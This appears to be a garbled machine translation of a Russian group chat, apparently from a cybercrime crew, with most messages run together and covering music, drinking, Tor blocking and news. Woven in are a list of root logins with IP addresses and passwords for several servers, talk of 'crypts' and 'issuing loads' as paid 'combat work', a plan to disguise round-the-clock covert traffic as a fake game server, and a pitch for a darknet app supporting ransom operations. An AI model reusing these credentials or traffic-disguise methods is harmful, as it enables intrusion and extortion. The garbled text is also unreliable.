logged inrubenhwif64 put it on) i have nothing but smartctl@jaime with a vicoy to test... it's like eating a hdd without vodka)@all those who haven't gotten their salary, write to me in personThere's old mandriva! 
i'm sorry, not victoria but hard disk sintinel there is a program victoria it shows health and performancedassd kingston work 70k hours 24/7, filling 90%, may be sluggish due to wear? yes, normgit works?Angelo, you so flap your wings - you'll break your luck)))) "Winter is coming "Soon, the first day of winter for everyone) Yeah, tor-the new browser really crashes tabs Zhenya - No Rules (final)`)) on @rags you too danke. In the subject)):smiling_face_with_3_hearts:oh yes what:kissing_heart:clearly)mutual)evening)thank you guys for a good)similarly, the old track just go to sleep)so okay, all the good morningahem, I do not follow him)something similar to the noise by the way, "here and everything. so what" track time - no it sukby would be good) let's write) about hair from the ears you can write a text ... 
interesting gettings)so the old age, here it comes, and it seemed yesterday still was somewhere beyond Everest ahahahaha)))) and if the hair grows from the ears this is daaaa:grin:ping fuckin(ping))) the beard is nice to a man, but if there is no beard it's no problemIlya Slovesnik like a man's beard)a beard on birthdays in kindergarten sang edith piaf under the sky in Paris dont know it cheep cheep chalyari pro ducklingsUnder the sky in Paris my caronka on the accordion was when toddlers sang in french at school "For Merry Ducklings" and Edith Piaf also. I learned french and adriano chelentano where would the powerhouse be if you weren't there)et si tu n'existais razDessan theme also french for the judgment of society?joe dasseypian the author will throw you here in a chat:grin:it's just a fantasyJim made Beam like :rofl: but the idea is eternal so there is only here, and the rest, what could be -:thumbsup:all this in 21 we will leave those who in our past awareness of that year existed, so let there and fuck up who you in the past))i.e. i.e. the conscious choice of ass - as a certain hopelessness itselfNo, it should be a conscious choice as less often as possible. kick it or fuck it up like a snowdrop sometimes there is no way out but life is a thing yea, you're right it's ok for yourself, the main thing is to have time planned for yourself, i think so, otherwise you'll fuck up :roflI'm already running out of viskarek. Self-education is just for me. it's not a pain. the problem for me is to form an answer to my question. to understand it by ear. it's not a problem to speak English. i haven't lost anything. 
or is it better to leave everything as it is :grin:1 pedagogical 2 philological:)she has two degrees in english my wife studies guess who))) guess what it is:rofl:bitcha actually there was candy and dreamsbeen searching for the words can be a dreamheard something interesting decided to practice on the music ok I sleep all happy january, love all) fucking study inglishvot so ... how many fans of the beautiful genius among us it turns out)audiomaniac:japanese_ogre:))) I agree with the fact that he just fucked up in this businessa I do not agree that he is powerful(but not really)and it's like he has a copyright theme :thumbsup:yes too powerful man `https://www.youtube.com/watch?v=uWbBSGAYns8 `sekili wo:joy::grin:this spoiler immediately looks at you, as on shit)) or so "we fucked all of you in the mouth it was izi "maybe it was written not to sound egoistic =)so who is a pro it is still a concept to themselves here we have generally other keys in the profession)) but fuck these professionals here all not a proyou can play with even higher qualityWe are not professionals in the description)) no, suddenly the fuck the author is still alive and ask john stump. their hands are growing with geomtric progression)))) \How can you create this is the question of a million))) 4 is not enough just did not get there)) `https://www.youtube.com/watch?v=_5FFYMe-MGE `in four hands?) I threw a link as a Death of a Pianist - 2 hz how can you play this also normal there is such a movie Pianistebane just like his game.t live `https://www.youtube.com/watch?v=_5FFYMe-MGE` there's also a sheet there about how art is real, genuine changes anyone and makes you feel, no matter how hard you try to resist. and the bully was fucking with the eternal scales because of the stench)) john stump waltz of the dead John stump waltz of the dead... John stump waltz of the dead... John stump waltz of the dead... https://www.youtube.com/watch?v=ynEscyMdIjg... 
Noonono or notMaksimov seems to be something like this myself... I found one verse by heart from school, Eagle I remember who the author also came in about the fiddler and the neighbor hooligan on TV a few days ago saw a performance. bluebird competition, there Inna Churikova reads a verse about the fiddler hooligan. Can not find it, but just a fire poem, the author does not remember, I just the first time I heard a workpara minute) hope to find it) fucking rebus myself did it really is a masterpiece as a man just for fun composeda I saw and heard myself wanted to, i started studying the sheet music) i'll show you something)) grieg is strong, the melody will see our great-great-(great)x*x times)) talent is a very elastic notion but he didn't invent anything of his own, they also call him a talent you just watch how she plays!//www.Youtube.com/watch?v=gSY-wD4l5DM` seems to be a normal recording from a phone, bro, you can't really hear anything in the mountain king's cave))Antonio Vivaldi's cycle "The Seasons" WINTER part 1:innocent:You should start the year with something good, something eternal. And what could be more eternal than music + https://www.youtube.com/watch?v=nYAXNq8rX0I? Let's say it all costs a fuckload of guitars to play live, and so on.there it is, you'll pick up analog to your taste (analog means live preamps, guitar cabinets) and then there's more, if you get into everything more or less, and you like itManuals on YouTube to help you with all thiszatem download from a torrent guitar rig 6 for your eyespf ukfpfsteinberg ur12shcha say around whatvneshnyaya buy sound card instrumentalpurchase guitar on a budgetIn terms starting now @Garfieldoktax if you find one throwtim straight from the soul)) what solos and .e.) from the first take) there's a video on YouTube where he plays at the stadium at the hockey game zapisalu livenu that is. i can't say anything about him in terms of live music, i told you about him. 
i've seen him before, he has an aux output or something like that in a budget`https://www.youtube.com/watch?v=SINjsb3plWI `but so and dick scored))) I once looked all sorts of attachments, so that the "whole house" does not have to brand, with zvkosnimy something like @Garfield now sekMichel Seobin on the letter ` connect it in `...` deleted the linkthis guy found it, and what for the beginner on the guitar advise in general ? I don't have any problems with my hearing, even in terms of "home" vocals. studied at the music school, but not strinahi like that look at what he plays as a cannon playstocenimtam normal guy) in ls throw) aha) find the skinumandy*oyi he took the soul of some young sanda there))) there and kveik he fucked up, and worm jmik, and contra with dendia remember in let's get married he was invited to shan tsungav let's get married)) but should know who is close to this subject also on electric guitars etc. The main thing is that he is a good electric guitar player, and he played at a hockey match I don't know his name, but he plays like a true soul, the guy's playing the guitar and he's good at playing guitar) he's just a good guitarist) well, the judgments are abstract)) nah, hammett is one of the virtuosos of our time ok) i don't know who he is) and his place was taken by Kirk hammettmastain was kicked out of metallica or something)) i dont know, i listened a long time ago, I listened a long time ago, but I liked it, I just remember it with a secret place, maybe by secret place you mean trust?megadeth band, yes there lyrics like)):)so i fell out, what is the power and the man respected? 
\they were not fuckin' guitarists at the time the lyrics are so-so it's not a secret play called the fuckin' theme balladmegadeth they have a song i kinda liked itcrete place uncle mastain i love and respect megadethmochoch bro power if you're playing) duke nukem theme i remember 10 years ago picked up this how to learn it and it's in the bag i can do anything, I can do it all, but the main thing is not to be lazy. I always wanted to learn the strings, and I just look at it sometimes and blow off the dust (and another one coming up just 2ogo I have a masterful guitar for 2k baa can you play a Chenit from Kveyk?i've been playing guitar for 15 years and i'm self-taught, i thought about starting with something simple i wanted to study too, but in the cave of the mountain king to learn how to play the piano))) 6 years music school, keyboard self-taught, i can't read from the sheet to read on the computer keyboard now i just work on my material, you know what's up?i'm also in the past) i've just recently put together a hobby, i'm just a musician myself))) \Fucking hell, they're everywhere already \https://www.youtube.com/watch?v=sQiD90jfKYE` rofl:rofl: i'll go listen to koko keyboard with danya milokhin on youtube and i have a phone)) who is it bro?) i hope they drink there? 
yeah i see mik and jim from the slips fucking riffing in some interview=) let's listen to what kind of music?I can not understand what is the point of this action, these people were identified by some psychologists, boring people from work, go with a beer can bought and drank near the pub, I have a friend who likes this 2-3 cans a week, I do not understand these people)) just turned around and over) and here on the third monitor chat opened just wanted to listen to a couple of tracks without distractions) no, alkgolism is when you booze for two or more days you have an interesting conversation here)fuck you flash)) you live out of time 10 minutes for a couple of seconds this is a verdict based on my childhood friendeboek is already dakajday on 2l beer I think not there how to classify, alkgolism is a couple or three cans of beer a week, is it so? Or am I confused something2 days booze it's overdone so you can really drink in short there is no one who does not drink so this year, will stay home most of the family work, someone has a family I do not mean that they are some kind of alkali) just drink with or without reason will return soon here either you with them, I'll be away from you for 10 minutes, you can't have a hangover. For example, today I drank for the second day, and before that, it's never happened, i have a social circle that includes a shitload of bluebeards, sometimes alcoholics need it) everyone drinks as they say in general i started working, got a family, i split from my friends who were bluebeards long time ago you can't even imagine)) the fuck you got in a society of alcohol-maniacs) i did not want to die a virgin it was a barbarity i used not to drink it seems to me that it is impossible to move, because everyone else drinks in general:But methinks how, seldoma how to relax without alcoholic beverages tomorrow, read today I'm going to update, if I can.....i have to change drinking for sleeping instead of drinking, you just have to have a rest. 
this year you have to change everything, you have to give up drinking and rest. it's true, all irritants have to be ruled out at once, while you are sober))) methods according to your tastes:I don't think I'd better relax, you may light a light bulb and ace the word stop in your head)) I don't like strong alcohol and snacks, but be careful if you don't have an ace up your sleeve, you can't drink =) but you should touch something painful or you'll get into a fit of rage, that's it, the price is fucked up, not like the price of oil and gasoline - so it's not right)) roughly speaking, they take alcohol =) so it's true that they distill it from oil so I'm a calm and kind-hearted man) vodka has become harsh because it needs to be so. it is originally alcohol diluted with water. I don't know who and what started to dilute it with water, it's a tenth thing and I haven't even started drinking it yet) Jack Daniels costs dox and I'm too sorry to buy it. It's not the degree of alcohol that makes your brain go out like a tumblerWater is a harsh swill40 is dangerous for me Mostly 25-20 I drink max 30)) Fucking infusion40 degrees is infusion =) I don't drink vodka, it costs max 250 rubles at the buy more:grinningthe most fuckin' tincture is a Ukrainian production Pervak without a snack the whole liter tried it I said let's try it then I remembered about the tincture I said let's go to my place for a couple of hours and then go home I remember I invited a friend I hid the alcohol sometimes better than any other valuable property =) but the tincture on the macadamia nuts - a fuckin' topic I don't know I'm no expert here they say natural production the alcohol was natural the former owners worked for the pharma production That's why they hid the alcohol in Ethiopia. There's nothing to ferment it and it's the first time I've heard of it. I don't understand the ageing of alcohol. 
I'll write down the recipe: A guy in his old private house dug up a 3-liter can of alcohol, it was in the basement, and he bought an old house, the 70s. I've never tasted anything like this before, it's like a vitamin) They'll come back to hang over, will they bite too? And if you get them drunk on tincture?I've been drinking it all year round. I'm going back to the question of where to go, to Ethiopia but the natural product costs as much as an airplane, the more it costs the better it tastes, you fill it with sugar and macadamias nuts together with the skins, buy some good vodka (absolut for example), or if you have access to normal distillers it will be even better I can only advise you) you know what is the best fucking recipe for a good drink?)my verdict - shit))) like bourbon I remember the first time in my life I tried Jack Daniel's, sweet and sour taste, it's basically the biggest plus that it does not require anything at all, but I have not tried it bourbon?i will look it up on googlea but i did not drink that stuff i did not classic jim, apple)) i will have to steal apple juice from my daughter) i ran out of pepsi) i still have half a bottle left i drink william (spiced) Jim Beam 1l ends with me)) i drank a glass of shampoo, sat for Youtube and went to bed sober for the 1st time in 2 weeks decided to get higha it's all right) this is true in nature "what does not kill you makes you stronger" now i let myself, i'm drinking whiskey i thought i would never live to see the light of day, especially in the last 2 months. i have had the most fucked up year. i feel good now. i wish there was something to copy from. they all do it by the same copy. If someone somewhere once handed down a verdict that was needed and it was immediately accepted as a precedent, then all the other decisions will be identical, without even thinking... That's what I'm saying) our laws do not work) even though there was no topic on Caucasians. 
I told the same thing in court :grin:Next time you should say so: "churka" - this translates from some dialects of Caucasian languages as a sparrow. I'm proud to be a "software engineer-extremist". Fuck that. I'll rewrite everywhere. I'm in the process of registering myself a foreign phone number.:grinning:no, in the vk left a commentdirty plutonium bomb tried to set in motion or what?)) in the end `terrorism` was reclassified as extremism, because everyone just went bald from your ideas?) yes, me too. and if the penalty 10 kop, they will fucking accept it directly through their portal. ))) which was recently )10 kopecks more and there will be a fine for extremism, property and other bullshit through this portal once a year I pay my land tax, I changed my driving license in summer, created an application on the state tax, I came and waited in line for 4-5 hours. Dear users! For technical reasons authorization is temporarily unavailable. We apologize for the temporary inconvenience.`https://gosuslugi.pnzreg.ru/` The porky portal is still smoking :grinning:I hope this portal will die) such a service :grinning:Fuck ever such and where ever there will be... 
it's unfortunate, i saw it as a joke recently: in the revival of serfdom you can find out who your lord is on the portal of public services for all we need a principality where everyone will respect each other, and most importantly where laws will be respected we need a principality, in which each of its residents will be a boyar)) but as always, okay, Yes, this scribe is creeping up by leaps and bounds, there's no doubt about it, but the conditions here are more or less, but everything goes to the final point of no return, my two hairs on my head) as everything is tight hereRussia is the best country in the world, just trust me.But I do not feel it my homeDa no, I'm just about the pejorative name itI love my homeland The motherland, I have nothing against itDa, it is so salty, and there are sharks Do not offend our homeland, it still Russia)preferably in a country that has no relation to russia Where can I get out of rushki?) Well, it's like if it's freezing, it's lights out at school, but everything is on the street immediately from the morning))) by the sea in 50 meters) tough))))) I was a kid how you found in the closet at my grandparents all kinds of coats, boots, in general, "trunk" of warmth from World War II, in199 .. what something, itself in all it was wrapped up and has told that to me it on frost and has gone for a walk one in a court yard, in a snow to roll, from a hill to skate... and frost rare -35-38 somewhere was (the Volga region). Well in the end I was told later that he goes to school that way - it's warm, what the fuck are you doing? I had to say that I was sick))) fuck, and where do you hang out there that?)I had already forgotten about it, look at me):grin:i remember when i was 14 i stole my grandfather's gun and went around the countryside shooting pheasants. i fucked nature in summer it was hot and fucking cold in winter. it was the Amur region. 
i was in the 146 socks and valenki, wrapped in 100 sweaters and 50 fur coats, that's true, where a man can test his strength, I've experienced max -40 on myself, it doesn't break my bones, as my grandfathers told me, but where it's -50....70 in winter... I think you're right)) in terms of survival, everyone has his own struggle, his own war, I guess it's just the same (it's interesting) where it's +30 all year round, the common cold is the most harmless thing that can happen to a man in the street. There any "branch, bush, log, and all that lurks there" is ready to fucking kill you by default) I would check it with pleasure):grinning:Do they know what a cold is?i think it would be cool to change the environment, just for the experience, e.g. radically go to australia i'd love to go somewhere without snownee, i've forgotten something, haven't you been on the ocean for years and you miss the snow?)) there was someone complaining or bragging unobtrusively :grin:ooh, happy new year to you too)happy new year)))) that's the meetingonjour fucking days)happy new year, happy new code)If by chance someone is friends with the admins of Codeby.net - scribble in your personal info :) hello everyone!alive for a while probably a lot of people are still alive and are struggling with the table)are there any survivors? @all checking communications should be otherwise? All alive after the meeting? yay! For the German crbym gkbp ccskre yf regt #6From the German regt translates as "stimulate". 
Google translated) Stimulates something under the number 6 in the chamber number 6 we can always make it) again you're in your Sanskrit why "compartment number 6" @not regt #6@ )@mitzi crbym gkbp ccskre yf coupe #6 )))), this is what cartridges to put, I need to look maybe there really is suchN2O which emits?:grin:better then not a vacuum cleaner and ozonizer + air filter, and useful and kayfuko coffee in the morning I drink and feel like in the movie "avatar" - only instead of seeds/flowers of the sacred tree, cat pollen flies)old lady really already, the batteries are flooded, all day lies on them, I am bald) you know how much hair from it? ░▐▄░░░▄▌░░░▄▄▄▄░☽░▄▄▄░ ░"""▄"""░▄""""""▄░▀░▀ ▐▌╬▐"▌╬▐"""""""""▀"░░ ▐"""▄"""▌"▀"░░"▀"░"▄"▀ ░▀"▄▄▄"▀░"░"░░"░"░░░░░ ┌─┬─┬──┬─▀┬▀─┬▀┬▀─┬──┐:woman_red_haired:which ones? What the hell do you need it for, there are more versatile machines for that (.)yesterday bought a robot vacuum cleaner - has not even unpacked, and stands in the corner - robot-pile$0$.ggv Monday knock me, I'll throw you the standard instructions, for beginners just right, the main thing is to find a whistle or laptop, but the signal there is weak, you need more help, no timeweldon hello, figured out the scrap wifi? 
pour wifi):vulcan:dobroenet, but now these forums pondroye https://threatpost.com/revil-ransomware-core-member/175863/ i am not freeloader, i am a partner (s) i was a subcontractor for Bogachov for a while and the group_ib is being searched there, there is a whole article about some nikolai with a house and a swimming pool from russia) lockers have always been questionable for the hacking scene) judging by the news reportsRevils in the hacking scene turned into house-2deanontut there was information that the Germans were on the trail of one of Revils....He's been here since morning and not until late evening, as far as I rememberWrite him tomorrow, ask him)If he's working, probably...Well, he's normal? He was todayTo talk to him todayI know that dane was sick, someone talked to him? I just made this conclusion because all my symptoms were similar, the smells were gone, my eye was twitching for 3 months, maybe it was a consequence, I was tested for antibodies and they are present, it turns out that the whole family got it in the spring of 19, a couple of days with fever and 3 weeks without taste or smell and then many people got covid, I do not know the norms, recently the whole family got covid, better tests than speculation... i have all been sick with what, who has bronchitis, who has orvioksti okojatny not need us such tests))) somebody saw/communicated recently??? test positive for kovid) + works test on hubra wrote))) i read that developeri stylish outfit he cat was a fuckinx, only the legend of the cruiser remains.. orrg? was he a developer?
well, forks not forks, who's to say, all the glory to him forks is great, i think zeus didn't do enough damage after breaking into revolutions? now there's already fans in fbr) Happy birthday, yevgeny mihaylovich! https://www.fbi.gov/wanted/cyber/evgeniy-mikhailovich-bogachevя there) ok@demetrius look in the toad! root 45.41.204.142 gZI79aU8C5R# NL root 144.217.50.254 123qweASDzxc UK root 5.39.63.98 123qweASDzxc FR root 5.181.80.155 123qweASDzxc USA root 103.208.86.22 1oa0N;z3JW6:rM New Zealand root 94.140.114.254 H4CHf5jVM2gDqSp LV root 139.28.235.26 123qweASDzxc USA root 104.200.67.231 J9w2uh4f9Y USA root 45.41.204.140 8W*2LnN7%iDJ NL10 wpcp://tor.rf comes in - gritting his teeth :rofl:Me too))@elroy I believed he could !or put linux in a virtual machine, and use it as a proxy also an option through docker under the windup to run a torproxy if that so Roskompozor has not fully thought it all out who have a wenda - let them go to the site through the linux livtd, download, install, and again all is available can install the package, run Tor, and the site will immediately accessible site no matter from distributions linux package Tor have not yet been removed? -- They probably didn't realize they needed to block the site and started blocking the network. Gone is the great phrase of @angelo. 
*"let Franz call the RCN" ``` "Roskomsvoboda: ISPs and operators have stopped blocking the Tor network in Russia, only the torproject site is not accessible https://www.playground.ru/misc/news/roskomsvoboda_provajdery_i_operatory_prekratili_blokirovat_set_tor_v_rossii_dostupa_net_tolko_k_sajtu_torproject-1161956 ``` Apparently, Bro got through :sweat_smile:It all depends on your provider...not the new ones, but from the top 10*you can read the Habr, both Tor and the new vpn-sellers are blocked...hold tech support, angelo's coming :D `no internet, click and there's a dick on it, no internet` The director can just spit in the fuck, cuss in his face and say: he's an animal `something comes to mindhttp://www.youtube.com/watch?v=41deLpbTcawBut I'm getting ready, when it comes to my provider.Even Tor and openvpn not block yet.There are brief losses of the Internet a few times a month, and otherwise normal.And I have so far all right (hu * 3).I also have a problem with inetomotwork for the future A maybe, the providers are testing blocking.I think it's testing somethingkstat providers are all stupid nowAnd we usually take a third party, then this https://vpn.sn (aka aprovpn) or http://whoer.net Well, complain to support.So good, double, but the last two days began.I think it may be that the VPN service is overloaded, or it may be DDoS-checked, maybe even connection is lost for a short time anywhere between you and the VPN server, maybe your router or internet provider is unnoticeably screwed up. I had glitches with the wire provider when some freeloader put my IP and MAC-address, and at my expense was using the Internet. And I could not log into the network then.ay ayoh, tomorrow will be Silver scolded, nafluchili here)) no, publicqbuy ah, that is, it's not our vpn, like Mars? -- Then if everything is exactly normal with the internet, it's necessary to complain to their support.
Or vpn change to another.but i have a network cable from the router, and the client application "company" although the openvpn probably also made.but if one access point hangs, then after re-raising wifi must restart vpn> wifi for 5 minutes disappears is because the computer is, sometimes switches from one access point to another, which is closer (for example, I came from the bedroom to the kitchen, and there are two points are about the same) I have wifi, sometimes for 5 seconds disappears, and the Internet for 5-10 seconds disappears. Vpn reconnects and everything is fine. But if the wifi specifically sucks, then only restarting openvpn helps. Although the underlying internet is working without any visible glitches. Although by timeout it should of course restart, but if the underlying internet does not work, then there will be no connection. If, for example, wifi is down, it will be. It seems that before you have just had problems with the internet/local network, and now they have started. someone observed something like this? the second day something with vpn, constantly began to stop working until the all new reconnect. an updated tor-browser fonts in the rocket remained the same as they were (linux) browser yesterday offered to update the fact perhaps tor-browser updated? I have everything as was so I alone?something happened to the rocket all of a sudden, the fonts have changed and it became very uncomfortable to read it so don't flood it yet my goal is to give you a rest, while still ensuring the maintenance of vitality.Okokeya will be in touch regularly those who are not engaged in combat work (long-term projects) - formally, it's still a working day, but *free schedule * ;)those who are engaged in combat work (crypts, issuing loads, etc.) - teamleads organize standby, so that always one person was in touch in all chats. 
The schedule of issuing loads is determined by your customers - that is, in the end *your schedule depends on them (will / will not work) *jokingly )those who are busy in combat work, no holidays. Not a gram in the mouth, and so on.For those who have been with us for less than a year, I tell youafter the question "how we work in the new year" @alvnimost, respect, attentinobududit.so bridges should definitely useThanks, I will try.Use bridgeshttp://www.securitylab.ru/news/527359.php Today tor browser updated without asking, connected managed after an hour of trying.I took adat external ssd, and satisfied with the thing is theory, but in real life can be - dunno, NVMe all depends on the PCIe version, I now regret that the motherboard does not vryal with PCIex4, 2 times faster PCIex3 with flash drives poor memory, Samsung yes (the fastest, 10 years warranty), but which sandisk will not take) lolv you I had no doubt, our pole !What's wrong with winter depressions?what's the silence on the air? @pongping? @elliott unsubscribe+speak to me in person what do you need from him now? git not yet @alalnu fuh git? do not worry jaba soon will rise take nginx and way it proxies to some muzzle online games. The same tanks or ruler. or whatever is popular there now. Then get a domain similar to that of the game. Then you can use it inside as you please. And for fake connections, let nginx proxy some uri to nodejs script - a websocket server. And then you connect from other places via wss and send random data there at random times. The main thing to remember that the client always shelves 10-100 times less than what he receives.
kventin kinda have a web-designer? Remind the nickname pliz in the course of the same as with the toad (what's up with the git? I may be somewhat abstruse wrote, I just need a site, a fake, just what would it look like from the outside it seems plausible ...On the nodejs socket-io. crap out a server. and the same library connects with the client. If you go to the site, it was clear why it is connected to the "long" ... The question to the experts, we need a simulation of the website, preferably a game server with a web-mind, what would the connection in one port, the conditional 24/7 look logical. Maybe there are some ideas? Sps! If jabo come to life, plzu all tora( apparently the servers have senile impotence ))oxypressure in the morning nothing stands and falls da, at all jabo not working. Git also does not work (Whoops, GitLab is taking too much time to respond.)and git also -- does the toad work?) tor kolbasa@ruby there's such a morning directly in the toad does not let):grin:)))) ay krosavecheg my machineThank you all for the versions. tips and hints there are named cars now, the identity is immediately visible) or Eugene, but he offnu there is a type who on the release of a stiletto torrent downloaded through a combat vpn can itmanuel knocked ... turn off all the VMs and watch the result)) and they do not have to watch, just from their admin to check the VMs and processes, but it's a test run, there is no definition they have another problem do not think that they are watching and know the ID of the VM :) in proxmoxoni there chef somebody put on the test, and do not recognize it, there they are powerless) @gator @mitziuw proxmox? I knew that someone would see it and appreciate it !-Thank you brogeneNow it's already a rhyme )-Yeah )-Hokka ?-Hokka ?
¶ now he can't stand his dick ¶ Who likes it stronger, and someone sportsman I brew a stronger puerchik ...) Brothers who have not received zap - write in person! No. The phone was out. I had no connection at all yesterday. (( It seems that something happened to the tower. I did not even think at once, well done cat @generalinfoa I'm drinking here I think there was no need to drink beer and me) ahead of you, but thanks all the same! i just switched to the latest fox, it's the same, but the fonts are default I don't think so, it's in the official repositoriesMaybe it's a dud i got 10.5.10 on my phone too, but it upgraded itself before i switched from that fuckerI got 10.5.10 on my phone, but 11 on linux, there it is) i also got 10.5.10 from the off-site gives 10.5.10 ``` https://www.torproject.org/download/ Maybe you have a special version of the hacker? I have 11Interesting) Run an update check, says no update `Tor Browser 11.0 (20210602010101) Details Installed on: November 10, 2021, 9:07:28 AMStatus: The Update was successfully installed `10.5.10 64 bit -OK.A new is what? I have a 10.5.10 last, it works well with me like nothing. I have the previous gdi resources leak mercilessly. about this I will not sayTo that you recommend not to update? tabs fall, canvas stupid third of the screen ate, some tabs are deleted from memory and when you open the page reloadsWhat is it?the new tor browser is a cunt@frances Hi, look there in the personal page of the other) that's capitalism, as long as something grows, sit back and enjoy it I read about btz information from Weldon, came - I looked ... just a good Friday night to learn) bitcoke is growing, what's your hemorrhoids?I can't wait for you today, I can't wait for you. 100 should be 60) efrainAgain, I wish I could. 
With this trend I can expect 100 by the end of the year.A bitok that at 60 + is already back to the position at the beginning of the year)software is spinning - beer is flourishing)) okay, while the sbrka is spinning - for a beer sgonyuyu certainly played@angelo you played?)In the GEH could play tetris and DumYou said I immediately remembered! Yes GEH was super! This is like drinking, only in reverse)@jaime remember the GEH? :)it's a chat room for impotent virgins bitten by wild poisonous penguins :penguin:and where is the chat room for drinkers druochunov? are those who only eat what do not drink? hey guys it's a chat room for non-drinkers wankers emptyahaa sure this is the channel? yes, I love everyone in the world, this is my homeland!I love live cats ))) ok don't get wound up, I love live ones ):laughing:I'll go watch russia24 and see if it's sad.It's not that bad, of course they die in the process. i like cats :heart_eyes_cat:you're mean. come back anyway)) start pamping i'll come later ))))) i'll come down and rip tails off) angie, don't touch cats ears)) i just didn't want to write "in heaven" here. it would have sounded too much. ♪ innocent:64k go ♪ ♪ you're up there in your clouds, you're no match for the death cats ♪ (*you're up there in your clouds, what's the point of mortal cats? (*you're up there in your clouds, what's the point of mortal cats?) Watch the cat60 in the morning (pampire beats, beats, beats))) In Praise of Salary!) And the eyes of those who were asleep shuddered, and the beats of the cats who were dozing rustled...Hello, everyone! who is not asleep - send kosha in person :) thanks.
it's me tor gobitDa all seems to work, push I can not check, because there is nothing to fluff@all git working at all? not run over) Oh Hammer working hard) overpowered me! at home of course !I don't need sticks, I'll throw them myself and drink water, if he doesn't come out, let him throw the ball :soccer:He said he'll start at 10.hello, when will Silver come out? Happy New Year to all who are celebrating! I'll take it from the balcony, make some dice and give it a Happy New Year) although you can eat vodka/cognac... to drink or not to drink... that's the question... well, stupid))) so you have to answer your foreign colleagues to the question "will you celebrate this incomprehensible holiday?" and what is * yes, no probably? yes, no or probably???
no probably for Stalin? they just have a failure of the matrix I wonder how our foreign colleagues perceive *the old new year *?? like *back to the future *??) well, what? meat is never :rolling_eyes:in a place with worms? as is usual, before the first flies ate!? @angelo Misery... and you finished the olivier??? :heart_eyes_cat::)they say you do not booze, booze again by the way, Happy Old New Year to all:partying_face::innocent:It's OK there, don't forget about your thigh and Mashka, don't forget to finish your wine in the cradle and go to bed. https://coub.com/view/2c506b ``somebody's got cohibas for every occasion.`` https://coub.com/view/2c6khb ``And it's not there, it's there!`` That's it, my purpose in life has just gone to the cunts. Even Serguei, the Tuvinian, is just an army general. In history there was only one marshal of the Russian Federation who could not be one. That's it, I will not be a marshal - All Vodenka. There are no marshals in the navy. there's already clear the fuck is clear all the cocks marshal fleeta who's above admiral is clear the fuck ? dunno why i'm interested in this at 2 ama admiral is clear the fuck is not even kopetan obviousness the main hole how to earn on this by making project with open source)@benny yes@someone else git? the purpose of discussion - find holes in the concept, improve and add. Maybe prove (un)viability.
4thJL2KJv4akuNm8FQ https://qaz.im/load/5SN9FT/F6EasF ``The essence of it comes down to making an app that seamlessly integrates the things you need for the darknet economy: - normal chat, with file and media transfer, with offline messaging, with channels on which you can do a lot - task management (like we have, for example), paid subscriptions to channels with important info, communication with ransom targeting, and other stuff - with integrated money - which have all the features of untraceability and anonymity, based on onion routing and cryptography. 422 The change you requested was rejected. ``RTCooooo help us so we can help you`` telemetry is for your own security! (s)Or wrap it up with a proxy, watch/log connects and data volumes.So what's there to guess about?) Take the browser and limit its traffic, allowing only the required nodes, surf for a while, then watch its activity on other nodes, it will be clear whether it sends something somewhere or not (I mean, whether it tries)I did not expect another answer, it is clear that the mass market can not be private a prioriI use ita couple of months ago saw the news that Brave leaks everythingA.on exposure? Are there any links to it? but touted to be, like, super-private As far as I heard, it's the same spy browser as ChromeGit again 422The CSTO Collective Security Council, in accordance with Article 4 of the Collective Security Treaty, decided to send CSTO collective peacekeeping forces to the Republic of Kazakhstan for a limited period in order to stabilize and normalize the situation in that country, said Nikol Pashinyan.https://siasky.net/AAAEwihO5yDHhVEOYB2gBfsGiLgUTxbyo8KGtTO04dtRGQ (!)
even after the rise it is the lowest price in the world (it is from panorama))) but the price in ru is higher anyway it was panorama) fuck, I must go to bed, what news from what site?And what's the surname of Andrew, check it out and let's do something on the sly)Otherwise the holidays will come to a screeching haltDon't drink too much) What a sad fucking situation, nothing to say :sweat_smile:Like russia supplies Russia 2 and this is normalI like it better General Director of russian company "Gazprom - Kazakhstan" Andrei Skomorokh admitted the mistake of unjustifiably raising gas prices in Kazakhstan. The head of the company put the blame on the economist, who used depreciation factors for Russia when forming the price of gas in the republic. "A specialist at our head office in St. Petersburg mixed up the multiplier and calculated the price incorrectly. In Russia, we raise gas prices up to 50% every year. With us, price increases usually do not lead to such serious consequences. People just pay and drive in silence. It is very unfortunate that such an unfortunate situation has arisen because of such a misunderstanding. We hope that soon the market will stabilize and people will get used to the new reality. Once again, we apologize to all the people of Kazakhstan and wish them a merry Christmas," said the company's CEO. Skomorokh added that the price of gas in Kazakhstan is not possible to lower because of the approved budget for 2022. According to him, the revenue side of the company is not subject to change under any circumstances, and it will be possible to revise it only in December of this year.They have financiers who think how to save their wealth, they rob everything and everywhere... If the price of gas is a penny, having a good generator that runs on gas, you can fuckin' multiply this gas with asics or something like that, as an option there is looting and sterling going on! 
Everything is adult December 29, 2021 Miners forced Kazakhstan to think about building a nuclear power plant Kazakh authorities stated they need to build a nuclear power plant because of miners Due to the onset of energy shortages in Kazakhstan authorities have begun to discuss the creation of nuclear power generation in the country. This was announced December 28 Minister of Energy of the republic Magzum Mirzagaliyev, his words reported "Vedomosti". not immediately, of course, but over time. such may be their cunning plan? such a thought flashed, in short))) It's about the U.S., of course, in a way ... in the U.S. ?))) and nah 50 + % of the world's miningKZ they will already remember the "risk zone", you need the next redistribution of capacityInterestingly, and where the Chinese next try to find an "island of freedom" for this activity? assuming that the instability will only increase aaa) coincidence? i don't think they need a global shutdown, you know what the chinese miners have done to them?they need the internet, you know, the miners from china and the miners from belarus...) well, fuck, they went to the shop ahaha, there are such things as miners have come to them, yes, he is closer to them than to Belarusians... just wait until they get to tsoi I liked Belarusians more, they felt more relatives to tsoi, like in 91m... I fucking watch the video video, they expect bullets and burning cars like meteorologists? 
the internet is promised in some places, it feels like 3g) and so the stock exchanges have already gone down3G is working, there is an internet in some placesNow it's like everything will go down thereTo say they are sitting there without internet at all?Tell me about it, I used to kill with love in my eyes in Postal 2 )When you can put a cat on a gun and it will be silenced with a soulAnd the cool stuff they used to doDoom 2 ignited the spirit of bloodthirstiness in us !Postal 2 overplayed it all because of playing what IT people are bloodthirstyNow special operations are starting, with open fire on the terrorists, as Tocaev says. It seems to me that besides executions there is no way to change the government, rallies are a joke, that is why I did not read the chat room, and maybe I was there as a bogeyman, comrade major. But it seems to be unsuccessful So what happened? Live Kazakhstan, Tokayev is asking for help from the neighbors. I wonder who will be the first to bring in troops. They scratched our heads and thought, why should people have so much fun on New Year's Eve? What about gas? > have NATO bases started to be built in the KZ? > Let's pray for democracy, the bases will be built later. Have you wished America a prosperous New Year?Tokayev dismissed Nazarbayev as chairman of the National Security Council. Russia is a generous soul) Russia will take fugitive prime ministers and presidents. We are sure that our Kazakh 